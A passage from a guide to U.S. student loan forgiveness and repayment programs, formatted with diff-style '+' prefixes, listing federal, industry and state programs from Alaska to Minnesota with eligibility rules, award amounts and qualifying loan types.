+Eligible borrowers may receive up to 100% of the remaining outstanding balance after 10 years
+and 120 eligible payments.
+Loans That Qualify
+ Direct Stafford loans
+
+ Direct Parent and Grad PLUS loans
+ Direct Consolidation loans
+Parent PLUS loans are only eligible if you consolidate them into a Direct Consolidation loan and
+repay them under the standard or income-contingent repayment plan.
+You can consolidate any non-Direct loans into Direct loans; however, the payments you made
+on the underlying loans do not qualify.
+Next Steps
+The form to apply for this forgiveness plan is available here.
+SEMA Loan Forgiveness Program
+To Be Eligible…
+This program helps recent graduates in the automotive aftermarket industry get off to a
+successful start. You must work for an employer that is part of the Specialty Equipment Market
+Association (SEMA) and:
+ Be a U.S. citizen.
+ Have completed a graduate, bachelor’s, associate’s, or certificate program.
+ Achieved at least a 2.5 GPA.
+ Have at least $2,000 in outstanding student loan debt.
+ Be employed for at least 1 full year prior to applying.
+Loans That Qualify
+ Stafford loans
+ Consolidation loans
+ Parent loans
+ Grad PLUS loans
+ Perkins loans
+If selected for the award, you will receive $2,000 toward outstanding student loans mailed
+directly to your lender. Previous recipients of SEMA Loan Forgiveness are not eligible to
+reapply.
+Next Steps
+You can apply online here.
+Teacher Loan Forgiveness Program
+To Be Eligible …
+
+You must teach full time for 5 consecutive years in a designated elementary or secondary
+school or educational service agency serving low-income families. Other requirements are listed
+in the link above.
+Borrowers are eligible to receive up to $5,000 a year or up to $17,500, depending on when the
+service began and what subject they teach.
+Loans That Qualify
+ Stafford loans
+ Consolidation loans
+For Consolidation loans, only the portion consolidated you used to repay eligible loans qualifies.
+Loans made before October 1, 1998, do not qualify.
+Next Steps
+You can find the application for this forgiveness program here.
+USDA Veterinary Medicine Loan Repayment Program (VMLRP)
+To Be Eligible …
+You must be a qualified veterinarian serving in certain high-priority veterinary shortage
+situations for an agreed amount of time.
+Those who are eligible may receive up to $25,000 per year for at least a 3-year commitment.
+You may be eligible for additional years of repayment with longer commitments.
+Loans That Qualify
+ Stafford loans
+ Grad PLUS loans
+ Parent PLUS loans
+ Consolidation loans
+ Perkins loans
+ Private student loans
+ State loans
+Consolidation loans that include loans in another person’s name (such as spousal consolidation
+loans) are not eligible.
+Next Steps
+You can learn more about applying by emailing mvmlrp@nifa.usda.gov.
+
+State Specific
+These forgiveness plans are state specific. You may be eligible in a particular state if you are a
+legal resident in that state, work in that state in one of the selected jobs, have a license for one
+of the jobs in that state, or went to school in that state.
+This list is not all-inclusive. Funding and regulations are subject to change. You may find more
+career-based forgiveness programs with an online search.
+Alaska Supporting Health Care Access Through Loan Repayment
+To Be Eligible …
+You must be a licensed health care professional practicing in a federally designated health
+professional shortage area in Alaska. You must also sign a 2-year commitment to practice in
+that area.
+Eligible applicants may receive up to $35,000 per year for 2 years; this amount depends on your
+field.
+Loans That Qualify
+ Stafford loans
+ Grad PLUS loans
+ Consolidation loans
+ Perkins loans
+ Private student loans
+Next Steps
+You can find application information here.
+Arizona Early Childhood Therapist Incentives Program (AzEIP)
+To Be Eligible …
+You must be a speech/language pathologist, occupational and physical therapist, child
+psychologist, or a mental health specialist who provides early childhood development services
+to children from birth through age 5 in specified areas of Arizona.
+Loan repayment amounts range from $15,000 to $25,000 depending upon the type of therapy
+discipline you work in. In addition, stipend amounts up to $19,000 are available.
+Loans That Qualify
+ Stafford loans
+ Grad PLUS loans
+ Perkins loans
+
+ Consolidation loans
+Next Steps
+Contact AzEIP directly for specific details and information about applying.
+Arizona Loan Repayment Program
+To Be Eligible …
+You must be an allopathic (MD) or osteopathic (DO) physician in the field of family practice,
+pediatrics, obstetrics, or internal medicine, or a dentist, nurse practitioner, certified nurse
+midwife, or physician assistant who provides primary care services in Arizona at an eligible
+facility. There are three priority levels for this award, which are based on the ranking of the site
+where you work (rural, non-rural, degree of shortage, population-to-primary-care-provider ratio,
+percentage of minority population, and distance from the nearest provider).
+Physicians and dentists may receive loan forgiveness of up to:
+Contract Year First Priority Second Priority Third Priority
+Initial 2 years $40,000 $36,000 $32,000
+Year 3 $22,000 $20,000 $18,000
+Year 4 $25,000 $22,000 $20,000
+Physician assistants, nurse practitioners, and certified nurse midwives may receive loan
+forgiveness of up to:
+Contract Year First Priority Second Priority Third Priority
+Initial 2 years $15,000 $12,000 $10,000
+Year 3 $9,000 $7,500 $6,500
+Year 4 $10,500 $9,000 $8,000
+Loans That Qualify
+ Stafford loans
+ Grad PLUS loans
+ Perkins loans
+ Consolidation loans that include only qualifying loans (Consolidation loans that include
+non-qualifying loans are not eligible)
+ Private student loans
+ Institutional loans
+
+Note that service under the National Health Service Corps Scholarship Program, Armed Forces
+Health Profession Program, Indian Health Services Scholarship Program, and the Arizona
+Medical Student Loan Program do not qualify.
+Next Steps
+Check here to learn how to apply.
+Joyce Holsey’s Arizona’s Legal Legacy (ALL) Loan Repayment Assistance Program
+To Be Eligible …
+You must be a law school graduate in Arizona employed as a legal aid attorney in one of the
+Foundation’s approved nonprofit organizations. You do not need to be a graduate of an Arizona
+law school, but you must have an annual income of $65,000 or less, which includes spousal
+support.
+Attorneys from government agencies are not eligible.
+Loans That Qualify
+ Stafford loans
+ Grad PLUS loans
+ Consolidation loans
+ Perkins loans
+ Private loans
+ State loans
+ Institutional loans
+Next Steps
+You can find application information at the site listed above.
+Arkansas Community Match Rural Physician Recruitment Program
+To Be Eligible …
+You must be a physician who is either in a residency or no more than 2 years out of residency
+serving in a rural community in Arkansas. You must agree to practice primary care in the
+community for 4 years.
+The community would pay the physician $10,000 per year and the state would pay $10,000 per
+year for a total of $80,000 over the course of the 4-year commitment.
+
+Loans That Qualify
+ Stafford loans
+ Grad PLUS loans
+ Consolidation loans
+ Perkins loans
+Next Steps
+You can access the application at the link above during the application period each year—which
+ends in February. Both the community and the physician need to apply.
+Arkansas State Teacher Education Program (STEP)
+To Be Eligible …
+You must be an Arkansas resident for at least 12 months prior to application and:
+ Have graduated from a teacher education program after April 2004.
+ Have a valid Arkansas teacher’s license.
+ Teach full time at a public school in Arkansas.
+ Teach in a subject area with a teacher shortage, or teach in a geographic area with a
+teacher shortage.
+You may receive up to $4,000 per year toward your federal student loans for no more than 3
+years.
+Loans That Qualify
+ Stafford loans
+ Grad PLUS loans
+ Perkins loans
+ Federal Consolidation loans
+Next Steps
+Contact the Arkansas Department of Higher Education for further application information.
+Bachelor Of Science Nursing Loan Repayment Program (California)
+To Be Eligible …
+
+You must be a licensed registered nurse in California with a BSN degree who is providing direct
+patient care in a medically underserved area, Health Professional Shortage Areas (HPSA), or a
+county, state, prison, or veterans’ facility. You will need to commit to providing this service for 2
+years to receive up to $8,000 in loan repayment. You may receive this award more than once
+and may receive up to $11,000 for the second award.
+Loans That Qualify
+ Stafford loans
+ Grad PLUS loans
+ Perkins loans
+ Consolidation loans
+ Private student loans
+Next Steps
+You will need to submit an application to CalREACH.
+California Army/Air National Guard Student Loan Repayment Program
+To Be Eligible …
+You must be a prior or non-prior service soldier in the California Army/Air National Guard or
+soldiers reenlisting or extending their service. You will need to sign up for a minimum 6-year
+service agreement.
+Those who are eligible may receive $7,500 per year with a lifetime maximum of $50,000 to
+repay your federal student loans.
+Loans That Qualify
+ Stafford loans
+ Grad PLUS loans
+ Parent PLUS loans
+ Federal Consolidation loans
+ Perkins loans
+To qualify, your loans must have been disbursed prior to your enlistment or reenlistment date.
+Next Steps
+You may apply here.
+California State Loan Repayment Program (SLRP)
+To Be Eligible …
+
+You must be a U.S. citizen or eligible non-citizen, a California resident, and a licensed primary
+health care professional who provides health care services in federally designated professional
+shortage areas to improve access to health care in underserved areas in California. You must
+provide full-time (40 hours per week) primary care in California for a minimum of 2 years.
+Private practices do not qualify. Interest that has accrued on your eligible loans is not eligible for
+forgiveness.
+Eligible borrowers can receive up to $150,000. They may receive $50,000 a year for a 2-year
+commitment, $30,000 a year for a 3- or 4-year commitment, and $20,000 a year for a 5- or 6-
+year commitment.
+Interest that has accrued on your eligible loans is not eligible for forgiveness.
+Loans That Qualify
+ Stafford loans
+ Grad PLUS loans
+ Consolidation loans
+ Perkins loans
+ State loans
+ Private student loans
+Next Steps
+You can find more details on eligibility and the application form here.
+CDA Foundation Student Loan Repayment Grant
+To Be Eligible …
+You must graduate from an American Dental Association-accredited dental school within 3
+years of your application or intend to graduate within 3 months of application. You must also:
+ Be eligible to practice dentistry in California.
+ Be a legal citizen of the United States.
+ Agree to serve a minimum of 36 months.
+ Work full time for an eligible work site.
+If eligible, you may receive up to $35,000 per year for up to 3 years of $105,000 total.
+Loans That Qualify
+ Stafford loans
+ Grad PLUS loans
+ Perkins loans
+
+ Consolidation loans
+ Private student loans
+ Institutional loans
+ State loans
+Next Steps
+Contact the CDA Foundation for more information.
+Health Professions Loan Repayment Program (California)
+To Be Eligible …
+You must provide full-time, direct patient care for 2 years in a California medically underserved
+area, Health Professional Shortage Areas (HPSA), or a county, state, prison, or veterans’
+facility. You must be licensed and practicing as a:
+ Dentist
+ Dental hygienist
+ Nurse practitioner
+ Certified nurse midwife
+ Physician assistant
+ Clinical nurse specialist
+You may receive up to $50,000 in loan repayment for a 2-year service obligation.
+Loans That Qualify
+ Stafford loans
+ Grad PLUS loans
+ Perkins loans
+ Consolidation loans
+ Private student loans
+Next Steps
+You will need to submit an application to CalREACH.
+Mental Health Loan Assumption Program (California)
+To Be Eligible …
+You may receive up to $10,000 toward repaying educational loans in exchange for a 12-month
+service obligation in a hard-to-fill or retain position within the County Public Mental Health
+
+System. Eligible professions in California are determined by county and may include the
+following:
+ Registered or licensed psychologists
+ Registered or licensed psychiatrists
+ Postdoctoral psychological assistants
+ Postdoctoral psychological trainees
+ Registered or licensed marriage and family therapists
+ Registered or licensed clinical social workers
+ Licensed professional clinical counselors
+ Licensed professional clinical counselor interns
+ Registered or licensed psychiatric mental health nurse practitioners.
+Support, managerial, and/or fiscal staff may be eligible.
+Loans That Qualify
+ Stafford loans
+ Grad PLUS loans
+ Perkins loans
+ Consolidation loans
+ Private student loans
+Next Steps
+Submit an application to CalREACH.
+Steven M. Thompson Physician Corps Loan Repayment (California)
+To Be Eligible …
+You must be a licensed allopathic or osteopathic physician in California who commits to
+providing full-time, direct patient care in a health profession shortage area in California for 3
+years.
+You may receive up to $105,000 for your 3 years of service to repay your eligible student loans.
+Loans That Qualify
+ Stafford loans
+ Grad PLUS loans
+
+ Consolidation loans
+ Perkins loans
+ State loans
+ Health Professions Student Loans (HPSL)
+ Private student loans
+Next Steps
+Submit an application to CalREACH.
+Colorado Health Service Corps
+To Be Eligible …
+You must be a U.S. citizen or eligible non-citizen, a Colorado resident, and a licensed health
+care professional who provides health care services for those in need as determined by this
+criteria.
+Eligible borrowers can receive up to $90,000 per year for up to 3 years, depending on their field
+of practice.
+Loans That Qualify
+ Stafford loans
+ Grad PLUS loans
+ Consolidation loans
+ Perkins loans
+ Private student loans
+ State loans
+Next Steps
+You can find the application form for this repayment program here.
+DC Health Professional Loan Repayment Program
+To Be Eligible …
+You must commit to a 2- to 4-year service obligation at an eligible site in Washington, D.C. as a
+licensed and certified:
+ Physician
+ Dentist
+
+ Dental hygienist
+ Registered nurse
+ Advanced practice nurse
+ Physician assistant
+ Clinical social worker
+ Clinical psychologist
+ Professional counselor
+Physicians and dentists may receive up to $143,137 over 4 years, and other eligible providers
+may receive up to $78,724. The repayment covers 18% of the debt in year 1, 26% in year 2,
+and 28% in years 3 and 4.
+Loans That Qualify
+ Stafford loans
+ Grad PLUS loans
+ Perkins loans
+ Consolidation loans
+ Private student loans
+ State loans
+Next Steps
+Use the link above to find more information about the application process.
+Delaware State Loan Repayment Program (DSLRP)
+To Be Eligible …
+You must work as a designated health care professional in an area of Delaware that the
+Delaware Health Commission designates as underserved. DSLRP requires you to sign a
+contract for a term of 2 to 3 years of service.
+Advanced degree practitioners may receive up to $105,000 for a 3-year commitment. Mid-level
+degree practitioners may receive up to $52,500 for a 3-year commitment.
+Loans That Qualify
+ Stafford loans
+ Grad PLUS loans
+ Consolidation Loans
+
+ Perkins loans
+ Private student loans
+ State loans
+Next Steps
+You can find the application for this program here.
+Nursing Student Loan Forgiveness Program (Florida)
+To Be Eligible …
+This forgiveness plan is for licensed practical nurses, registered nurses, and advanced
+registered nurse practitioners in the state of Florida. You must work at state-of-Florida-operated
+medical and health care facilities, public schools, Department of Health, county health
+departments, federally sponsored community health centers, teaching hospitals, family practice
+teaching hospitals, or specialty hospitals for children. Other Florida-licensed hospitals, birth
+centers, and nursing homes must be matched on a dollar-for-dollar basis by contributions from
+the employing institutions.
+Eligible borrowers can receive up to $4,000/year for a maximum of 4 years.
+Loans That Qualify
+ Stafford loans
+ Grad PLUS loans
+ Consolidation loans
+ Perkins loans
+ Private student loans
+Only loans obtained to cover nursing educational expenses or living expenses while studying
+nursing are eligible.
+Next Steps
+You can find the application for this program here.
+Georgia Physicians For Rural Areas Assistance Program
+To Be Eligible …
+You must commit to practice medicine for a minimum of 40 clinical hours per week in a rural
+county in Georgia. You must participate in the Medicaid program and actively treat Medicaid
+recipients.
+If you’re eligible, you can receive up to $25,000 per year for up to 4 years.
+Loans That Qualify
+
+ Stafford loans
+ Grad PLUS loans
+ Consolidation loans
+ Perkins loans
+ Private student loans
+Next Steps
+You can apply for this forgiveness program here.
+Hawai’i State Loan Repayment Program
+To Be Eligible …
+You must be a healthcare professional (physician, physician assistant, nurse practitioner,
+certified nurse midwife, health service psychologist, licensed clinical social worker, licensed
+professional counselor, or marriage and family therapist) who commits to serving for at least 2
+years in areas where healthcare worker shortages are the most acute in Hawai’i. If eligible, you
+can receive up to $30,000 per year to pay for your educational expenses.
+Loans That Qualify
+ Stafford loans
+ Grad PLUS loans
+ Perkins loans
+ Institutional loans
+ Consolidation loans
+ Private student loans
+Next Steps
+Complete and submit the Hawai’i State Loan Repayment Program application.
+Idaho State Loan Repayment Program
+To Be Eligible …
+You must be a health practitioner in Idaho working for a nonprofit or public facility located in a
+federally designated health profession shortage area. You must also:
+ Provide patients at or below 200% of the poverty guidelines with a schedule of discounts
+and patients at or below 100% of the poverty guidelines with care for a nominal fee or
+free of charge.
+ Accept Medicare, Medicaid, and the Children’s Health Insurance Program.
+
+ Commit to working for 2 years at the practice in exchange for loan repayment, and agree
+to significant repayment penalties if you don’t meet your service requirements.
+ Not be serving under another forgiveness or repayment program.
+ Agree to participate in a site visit with staff from the Bureau of Rural Health and Primary
+Care during the service period.
+You may receive from $5,000 to $25,000 per year for 2 years.
+Loans That Qualify
+ Stafford loans
+ Grad PLUS loans
+ Perkins loans
+ Institutional loans
+ Consolidation loans
+ Private student loans
+ State loans
+Next Steps
+You must complete a practitioner application and have your employer complete an application
+as well. Both are located here.
+Illinois Nurse Educator Loan Repayment Program
+To Be Eligible …
+You must be a U.S. citizen or eligible non-citizen, an Illinois resident, and a nurse educator who
+meets licensing requirements of Illinois. You must have worked as a nurse educator instructing
+practical or professional nurses in an approved Illinois institution for at least the past 12
+consecutive months prior to applying.
+If you’re eligible, you can receive up to $5,000 per year for 4 years.
+This program is accepting applications, but as of this writing, it has not yet been funded for the
+2015 fiscal year.
+Loans That Qualify
+ Stafford loans
+ Grad PLUS loans
+ Consolidation loans
+ Perkins loans
+
+ Nursing Student Loans (NSL)
+ Supplemental Loans for Students (SLS)
+ Private student loans
+ Institutional student loans
+All loans must be for nursing education expenses.
+Next Steps
+You can find various applications on the website linked in the title of this section.
+Illinois Teachers Loan Repayment Program
+To Be Eligible …
+You must have received loan forgiveness through the federal Teacher Loan Forgiveness
+Program and be a U.S. citizen and resident of Illinois. You must work for 5 years teaching in an
+elementary or secondary school designated as a low-income school, or you must work full time
+for 2 years in a child care facility that serves a low-income area in Illinois.
+Eligible borrowers may receive up to $5,000.
+Loans That Qualify
+ Stafford loans
+Next Steps
+You can find directions on how to apply to this forgiveness plan here.
+Illinois Veterans’ Home Nurse Loan Repayment Program
+To Be Eligible …
+You must be a licensed nurse practicing and residing in Illinois at an Illinois veterans’ home.
+If you’re eligible, you can receive up to $5,000 for up to 4 years.
+Loans That Qualify
+ Stafford loans
+ Grad PLUS loans
+ Consolidation loans
+ Nursing Student Loans (NSL)
+ Supplemental Loans for Students (SLS)
+ Private student loans
+ Institutional loans
+
+ Perkins loans
+ State loans
+You must have borrowed loans for nursing education expenses.
+Next Steps
+You can find applications for this forgiveness plan here.
+Justice Richard M. Givan Loan Repayment Assistance Program (Indiana)
+To Be Eligible …
+You must be a law graduate employed with a nonprofit organization dedicated to serving the
+civil legal needs of low-income individuals and families in Indiana. Your annual income cannot
+exceed $50,000.
+You may receive a loan of up to $5,000 per year for your service, which is forgiven at the end of
+a full year of service.
+Loans That Qualify
+ Stafford loans
+ Grad PLUS loans
+ Consolidation loans
+ Private student loans
+ Institutional loans
+ Perkins loans
+ State loans
+Next Steps
+Complete the application at the site linked above.
+Iowa Health Care Professional Loan Repayment Program
+To Be Eligible …
+You must be an osteopathic doctor, physician assistant, podiatrist, or physical therapist
+practicing in high-need communities in Iowa for up to 4 years. You must have graduated from
+Des Moines University.
+You may receive up to $50,000, which is paid annually at the end of each year of service.
+Loans That Qualify
+ Stafford loans
+ Grad PLUS loans
+
+ Consolidation loans
+Next Steps
+You must complete an application from Des Moines University’s website.
+Iowa Registered Nurse And Nurse Education Loan Forgiveness Program
+To Be Eligible …
+You must be a registered nurse or nurse educator employed in Iowa or teaching in an eligible
+Iowa school. You must be a “new” nurse who was not employed as a nurse educator or
+registered nurse prior to July 1, 2007.
+You may receive up to 20% of your total eligible federal student loan balance, but you cannot
+exceed the average resident tuition rate for students attending Iowa’s Regent Universities for
+the first year following graduation. For 2014, the maximum award was $6,658. You may not
+receive this award for more than 5 consecutive years.
+Loans That Qualify
+ Stafford loans
+ Grad PLUS loans
+ Perkins loans
+ Consolidation loans
+Next Steps
+You must reapply annually by completing the loan forgiveness portion of the Iowa Financial Aid
+application.
+Iowa Teacher Loan Forgiveness
+To Be Eligible …
+You must be a fully licensed instructional teacher whose first teaching position in Iowa began no
+earlier than July 1, 2007. You must teach in a shortage subject area designated by the Iowa
+Department of Education.
+If you’re eligible, you can receive up to 20% of your total eligible student loan balance (including
+principal and interest) per year. The maximum you can apply for is determined annually, but it
+cannot exceed the average resident tuition rate established for students attending Iowa’s
+Regent Universities for the first year following graduation. The maximum for 2014 graduates is
+$6,658.
+Loans That Qualify
+ Stafford loans
+ Consolidation loans
+Next Steps
+
+Eligible borrowers can apply to this forgiveness program here.
+Rural Iowa RN and PA Loan Repayment Program
+To Be Eligible …
+You must complete a service agreement to receive up to $4.000 per year toward your federal
+student loans for up to 5 years. You must also:
+ Attend an eligible Iowa college or university.
+ Be enrolled full time in a graduate-level program that will qualify you for licensure to
+practice as a nurse practitioner or physician assistant.
+ Receive a recommendation from your institution.
+Loans That Qualify
+ Stafford loans
+ Grad PLUS loans
+ Perkins loans
+ Federal Consolidation loans
+Next Steps
+You will need to apply annually with the Iowa College Student Aid Commission.
+Teach Iowa Scholars Program
+To Be Eligible …
+You must graduate in the top 25% of all teacher preparation program graduates during an
+academic year at a postsecondary institution and become a full-time teacher in an eligible
+teaching field at a school or education agency.
+You may receive up to $4,000 toward your student loan repayment for up to 5 consecutive
+years of full-time employment.
+Loans That Qualify
+ Stafford loans
+ Grad PLUS loans
+ Perkins loans
+ Consolidation loans
+ Private student loans
+ State loans
+
+ Institutional loans
+Next Steps
+You can find the application online.
+Kansas Bridging Plan
+To Be Eligible …
+You must be a physician in a Kansas residency program in family practice, internal medicine,
+pediatrics, or medicine/pediatrics. You must commit to practicing medicine after your residency
+for 36 continuous months in a rural community in Kansas.
+If you’re eligible, you can receive up to $26,000.
+Loans That Qualify
+ Stafford loans
+ Grad PLUS loans
+ Consolidation loans
+ Perkins loans
+ Private student loans
+Next Steps
+You can apply to this forgiveness plan here.
+Kansas Rural Opportunity Zone Student Loan Repayment
+To Be Eligible …
+You must have become a resident of a Kansas rural opportunity zone after July 1, 2011, and
+have an associate’s, bachelor’s, or post-graduate degree.
+Loans That Qualify
+ Stafford loans
+ Grad PLUS loans
+ Consolidation loans
+ Perkins loans
+Next Steps
+You can complete an application here.
+Kansas State Loan Repayment Program
+
+To Be Eligible …
+You must be an eligible health professional working in Kansas who commits to provide health
+care services at an eligible site located in a federally designated health professional service
+area for at least 2 years. Your employment must be at a public or nonprofit private agency of
+facility. The practice site must maintain an open door to all residents regardless of their ability to
+pay.
+Eligible physicians and general or pediatric dentists may receive up to $25,000 annually for up
+to 2 years. All other health professionals may receive up to $20,000 annually for up to 2 years.
+Loans That Qualify
+ Stafford loans
+ Grad PLUS loans
+ Consolidation loans
+ Perkins loans
+ Private student loans
+ State loans
+Next Steps
+You can find details for applying to this forgiveness program in the link within the section title.
+Kentucky State Loan Repayment Program
+You must commit to 2 years of practicing at an eligible site that provides primary care services
+to a health professions shortage area in Kentucky, accepts all forms of public assistance, offers
+a sliding fee scale, and sees all patients regardless of ability to pay.
+Physicians, dentists, and pharmacists may receive up to $80,000. Physician assistants, nurse
+practitioners, and behavioral health practitioners may receive up to $40,000. Registered nurses
+and registered dental hygienists may receive up to $20,000.
+Loans That Qualify
+ Stafford loans
+ Grad PLUS loans
+ Consolidation loans
+ Perkins loans
+ Private student loans
+ State loans
+Next Steps
+
+You may apply starting September 1 of each year.
+Maine Dental Loan Repayment Program
+To Be Eligible …
+You must be a dentist practicing in eligible dental care facilities in underserved areas of Maine.
+You must not be in a service agreement for loan repayment under the National Health Service
+Corps.
+You may receive up to $20,000 per year with a total award maximum of $80,000.
+Loans That Qualify
+ Stafford loans
+ Grad PLUS loans
+ Perkins loans
+ Consolidation loans
+Next Steps
+You may apply online.
+Janet L. Hoffman Loan Assistance Program (Maryland)
+To Be Eligible …
+You must be a Maryland resident who graduated from a Maryland institution. You must also
+work full time in public service in Maryland state or local government or nonprofit agencies in
+Maryland.
+You must work to serve low-income or underserved residents and must gross less than $60,000
+per year (if married, your combined gross cannot be more than $130,000). Nurse faculty must
+gross less than $75,000 annually (if married, your combined gross cannot be more than
+$160,000). Lawyers, nurses, nurse faculty members, licensed clinical counselors, physical and
+occupational therapists, social workers, speech pathologists, and certain teachers are eligible.
+If your total debt is $15,000 or less, you may receive up to $1,500 per year. If your total debt is
+$15,001 to $40,000, you may receive up to $3,000 per year. If your total debt is $40,001 to
+$75,000, you may receive up to $6,000 per year. And if your total debt is over $75,000, you may
+receive up to $10,000 per year. Regardless of your total debt, you can receive the indicated
+amount for up to 3 years.
+Loans That Qualify
+ Stafford loans
+ Grad PLUS loans
+ Consolidation loans
+ Perkins loans
+
+ Private student loans
+Next Steps
+You can find application forms on the website linked in the title of this section. You can also
+contact their office for paper applications.
+Maryland Dent-Care Loan Assistance Repayment Program
+To Be Eligible …
+You must be a dentist in Maryland treating the most vulnerable populations. You must serve for
+3 years full time at an eligible site and agree to treat a minimum of 30% MMAP recipients as a
+portion of your total patient population.
+You will receive $23,740 per year toward student loan repayment.
+Loans That Qualify
+ Stafford loans
+ Grad PLUS loans
+ Perkins loans
+ Consolidation loans
+ State loans
+ Private loans
+ Institutional loans
+Next Steps
+You can find the application and support materials here.
+Maryland Loan Assistance Repayment Program
+To Be Eligible …
+You must be a primary care physician (including medical residents completing residency) in one
+of the below specialties. You must also commit to practice for a period of 2 to 4 years at an
+eligible practice site operated as a public clinic by any federal, state, local government, or
+nonprofit that treats all patients regardless of ability to pay and is located in a Health
+Professional Shortage Areas (HPSA) in Maryland.
+ General internal medicine
+ Family medicine
+ General pediatrics
+ Obstetrics and gynecology
+
+ General psychiatry
+Your award may not exceed $100,000 for your total service.
+Loans That Qualify
+ Stafford loans
+ Grad PLUS loans
+ Perkins loans
+ Consolidation loans
+Next Steps
+You must complete an application with Maryland’s Department Of Health And Mental Hygiene.
+Nancy Grasmick Teacher Award (Maryland)
+To Be Eligible …
+You must be an eligible teacher who has taught in Maryland for the past 2 years. You will need
+to meet the general requirements of the Janet L. Hoffman Loan Assistance Program (also listed
+in this guide) and teach in science, engineering, or math OR teach in a school in which at least
+75% of students are in the free meal program for 2 years AND have received the highest
+performance evaluation rating for the most recent year.
+You must gross less than $60,000 per year (if married, your combined gross cannot be more
+than $130,000).
+If your total debt is $15,000 or less, you may receive up to $1,500 per year. If your total debt is
+$15,001 to $40,000, you may receive up to $3,000 per year. If your total debt is $40,001 to
+$75,000, you may receive up to $6,000 per year. And if your total debt is over $75,000, you may
+receive up to $10,000 per year. Regardless of your total debt, you can receive the indicated
+amount for up to 3 years.
+Loans That Qualify
+ Stafford loans
+ Grad PLUS loans
+ Perkins loans
+ Consolidation loans
+ Private student loans
+Next Steps
+You can find application forms on the website linked in the title of this section. You can also
+contact their office for a paper application.
+Massachusetts Loan Repayment Program
+
+To Be Eligible …
+You must be a qualified health professional as determined by Massachusetts and employed at a
+public or nonprofit health care organization located in a federally designated health professional
+shortage area.
+You may receive up to $25,000 per year and up to $50,000 total for 2 years if you’re eligible.
+Your profession will determine your award amount.
+Loans That Qualify
+ Stafford loans
+ Grad PLUS loans
+ Consolidation loans
+ Perkins loans
+Next Steps
+The application for this repayment program is here.
+Michigan State Loan Repayment Program
+To Be Eligible …
+You must be a Michigan health professional working at an eligible site in a health professional
+shortage area full time. You will need to commit to serving for 2 consecutive years at a time to
+receive up to $200,000 to repay your student loans over the course of 8 years.
+Eligible health professionals are:
+ Dentists: DDS or DMD
+ Physicians: MD or DO (Family Practice, Internal Medicine, OB/GYN, Pediatrics,
+Geriatrics)
+ Physician Assistants (Primary Care, including the same specialties as MDs and DOs)
+ Nurse Practitioners (Primary Care, including the same specialties as MDs and DOs)
+ Certified Nurse Midwives
+ Psychiatrists
+ Clinical or Counseling Psychologists (Ph.D.)
+ Licensed Professional Counselors (Ph.D./Masters)
+ Marriage and Family Therapists (Ph.D./Masters)
+ Psychiatric Nurse Specialists (Masters)
+ Clinical Social Workers (Masters)
+
+ Mental Health Counselors (Masters)
+Loans That Qualify
+ Stafford loans
+ Grad PLUS loans
+ Consolidation loans
+ Perkins loans
+ State loans
+ Institutional loans
+ Private loans
+Next Steps
+You will find application information here.
+Allied Health Care Faculty Minnesota Loan Forgiveness Program
+To Be Eligible …
+You must be completing your final year of a master’s or doctoral program that prepares you to
+become an allied health care educator in Minnesota. You must plan to teach at least 12 credit hours
+or 720 hours per year for a minimum of 3 years in a postsecondary allied health care program.
+You may receive up to $6,750, not to exceed $27,000, total for the maximum 4-year period.
+Loans That Qualify
+ Stafford loans
+ Grad PLUS loans
+ Consolidation loans
+ Perkins loans
+ Health Professions Student Loans (HPSL)
+ Private student loans
+Next Steps
+The application process is handled by WebGrants at the Minnesota Department of
+Health.Dedicated Minnesota Dentists Dental Education Loan Repayment for Service
+To Be Eligible …
+
+You must be a Minnesota dentist practicing in a health profession shortage area for 5 years to
+be eligible for up to $200,000 in loan repayment.
+Loans That Qualify
+ Stafford loans
+ Grad PLUS loans
+ Consolidation loans
+ Perkins loans
+Next Steps
+You can begin the application process here.
+Minnesota Loan Forgiveness Program
+To Be Eligible …
+You must be an eligible health professional (see site linked in the title of this section for more
+details) committed to a minimum of 3 years of service.
+You may receive up to $25,000 per year for a minimum 3-year commitment and a maximum of
+4 years. The amount you receive depends on your field and where you practice.
+Loans That Qualify
+ Stafford loans
+ Grad PLUS loans
+ Consolidation loans
+ Perkins loans
+ Private student loans
+Next Steps
+Applications are accepted only during certain times. If they are currently being accepted, you
+can find them within the career-specific pages on the webpage linked in the title of this section.
+Minnesota Loan Repayment Assistance Program for Law
+To Be Eligible …
+You must have graduated from a Minnesota law school or from any ABA-accredited law school
+if employed at a qualified Minnesota agency full time. You may receive between 80% and 95%
+of your student loan payments.
+Loans That Qualify
+
+ Stafford loans
+ Grad PLUS loans
+ Consolidation loans
+ Perkins loans
+ Institutional loans
+ State loans
+ Private student loans
+Next Steps
+You will find application materials here.
+Minnesota Nurse Loan Forgiveness Program
+To Be Eligible …
+You must be in your final year of a qualified nursing program and commit to working full time for
+at least 3 years in a licensed nursing home or intermediate care facility for persons with
+development disabilities in Minnesota.
+You may receive up to $3,750 per year for no more than 4 years.
+Loans That Qualify
+ Stafford loans
+ Grad PLUS loans
+ Consolidation loans
+ Perkins loans
+ Health Professions Student Loans (HPSL)
+ Private student loans
+Next Steps
+The application process is handled by WebGrants at the Minnesota Department of Health.
+Minnesota Rural Midlevel Practitioner Loan Forgiveness Program
+To Be Eligible …
+You must be a midlevel practitioner student, which includes Nurse Practitioners, Certified Nurse
+Midwives, Nurse Anesthetists, Advanced Clinical Nurse Specialists, and Physician Assistants.
+You must submit your application while completing your final year of an initial licensure
+preparing midlevel practitioner program.
+
+You must commit to practicing full time for at least 3 years in a designated rural area but no
+more than 4 years. You may receive up to $6,750 per year for up to 4 years.
+Loans That Qualify
+ Stafford loans
+ Grad PLUS loans
+ Consolidation loans
+ Perkins loans
+ Health Professions Student Loans (HPSL)
+ Private student loans
+Next Steps
+The application process is handled by WebGrants at the Minnesota Department of Health.
+Minnesota Rural Pharmacist Loan Forgiveness Program
+To Be Eligible …
+You must be in your final year of pharmacy school or residency training when you apply. You
+must plan to practice full time for a minimum of 3 years in a designated rural area.
+You may receive up to $16,000, not to exceed $64,000 total, for the maximum 4-year period.
+Loans That Qualify
+ Stafford loans
+ Grad PLUS loans
+ Consolidation loans
+ Perkins loans
+ Health Professions Student Loans (HPSL)
+ Private student loans
+Next Steps
+The application process is handled by WebGrants at the Minnesota Department of Health.
+Minnesota Rural Physician Loan Forgiveness Program
+To Be Eligible …
+You must be an eligible primary care medical resident (family practice, obstetrics and
+gynecology, pediatrics, internal medicine, and psychiatry) who commits to serving for at least 3
+years in an underserved rural community in Minnesota.
+
+You may receive up to $25,000 per year for a maximum of $100,000 over 4 years.
+Loans That Qualify
+ Stafford loans
+ Grad PLUS loans
+ Consolidation loans
+ Perkins loans
+ Health Professions Student Loans (HPSL)
+ Private student loans
